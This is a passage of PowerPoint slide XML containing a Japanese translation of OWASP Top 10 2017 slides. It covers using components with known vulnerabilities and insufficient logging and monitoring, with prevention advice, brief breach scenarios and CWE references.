              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>未使用の依存関係、不要な機能、コンポーネント、ファイルや文書を取り除く。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>Versions Maven Plugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>OWASP Dependency Check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>Retire.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>などのツールを使用して、クライアントおよびサーバの両方のコンポーネント（フレームワークやライブラリなど）とその依存関係の棚卸しを継続的に行う。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>コンポーネントの脆弱性について</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>や</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>NVD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>などの情報ソースを継続的にモニタリングする。ソフトウェア構成分析ツールを使用してプロセスを自動化する。使用しているコンポーネントに関するセキュリティ脆弱性の電子メールアラートに登録する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安全なリンクを介し、公式ソースからのみコンポーネントを取得する。変更された悪意あるコンポーネントを取得する可能性を減らすため、署名付きのパッケージを選ぶようにする。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>メンテナンスされていない、もしくはセキュリティパッチが作られていない古いバージョンのライブラリとコンポーネントを監視する。パッチ適用が不可能な場合は、発見された問題を監視、検知または保護するために、仮想パッチの適用を検討する。</a:t>
            </a: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ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>いかなる組織も、アプリケーションまたはポートフォリオの存続期間は、モニタリングとトリアージを行い更新または設定変更を行う継続的な計画があることを確認する必要があります。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"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A9</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t>既知の脆弱性のあるコンポーネントの使用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130491053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a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>悪用のしやすさ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>蔓延度</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</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1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>技術面</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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>多くの既知の脆弱性に対し、公開されている攻撃方法を見つけることは簡単ですが、それ以外の脆弱性は攻撃方法を新たに開発する労力を要します。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>この弱点は広く蔓延しています。コンポーネントを多用する開発スタイルは、開発チームがアプリケーションや</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>において、どのコンポーネントを使用しているかを理解していないため、最新に保たれにくくなります。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Retire.js</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>のような脆弱性スキャナは、脆弱性を見つけるのに役立ちますが、悪用のしやすさを判断するには更なる労力が必要になります。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>いくつかの既知の脆弱性は、軽微な影響に留まりますが、これまでの最大級のセキュリティ侵害は、コンポーネントの既知の脆弱性を悪用したものでした。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>保護する資産によっては、おそらくこのリスクはもっとも注意すべきリスクであるはずです。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>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#1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>小さなチームが運営するオープンソースのプロジェクトフォーラムソフトウェアが、ソフトウェアの欠陥を突かれてハッキングされました。攻撃者は次期バージョンと、すべてのフォーラムの内容を含む内部のソースコードリポジトリを削除しました。ソースコードは回復することができましたが、モニタリング、ロギング、アラートの欠如によって問題が悪化してしまいました。この問題の発生により、フォーラムソフトウェアプロジェクトは活発ではなくなりました。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP"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#2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>良くあるパスワードを使用するユーザに対して、攻撃者はスキャンを実施します。彼らは、このパスワードを使用しているすべてのアカウントを乗っ取ることができるようになります。他のユーザにとって、このスキャンは</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>回だけ失敗したログインとなります。また別の日に、スキャンは異なるパスワードで繰り返される場合があります。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP"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ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>シナリオ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>米国の大手小売業者が、添付ファイルを分析する内部マルウェア分析サンドボックスを持っていたとのことです。サンドボックスソフトウェアは、望ましくないと思われるソフトウェアを検知しましたが、誰もこの検知に対応しませんでした。サンドボックスは、外部の銀行による不正なカード取引によって侵害が検知されるまで、しばらくの間警告を発し続けていました。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ロギングや検知、モニタリング、適時の対応が十分に行われないという状況は、いつでも発生します</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ログイン、失敗したログイン、重要なトランザクションなどの監査可能なイベントがログに記録されていない。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>警告とエラーが発生してもログメッセージが生成されない、または不十分、不明確なメッセージが生成されている。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>アプリケーションと</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>のログが、疑わしいアクティビティをモニタリングしていない。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ログがローカルにのみ格納されている。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>アラートの適切なしきい値とレスポンスのエスカレーションプロセスが整えられていない、または有効ではない。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ペネトレーションテストや</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ツール（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>OWASP ZAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>など）によるスキャンがアラートをあげない。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>アプリケーションがリアルタイム、準リアルタイムにアクティブな攻撃を検知、エスカレート、またはアラートすることができない。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ユーザまたは攻撃者がログやアラートのイベントを閲覧できると、情報の漏えいが発生する可能性があります </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A3:2017-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>機微な情報の露出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>を参照</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="90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Implement Logging and Intrusion Detection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8"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard: V8 Logging and Monitoring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Detailed Error Code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Logging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ct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>外部資料</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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CWE-223: Omission of Security-relevant Information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CWE-778: Insufficient Logging</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>アプリケーションによって保存または処理されるデータのリスクに応じて対応する： </a:t>
            </a:r>
            <a:r>
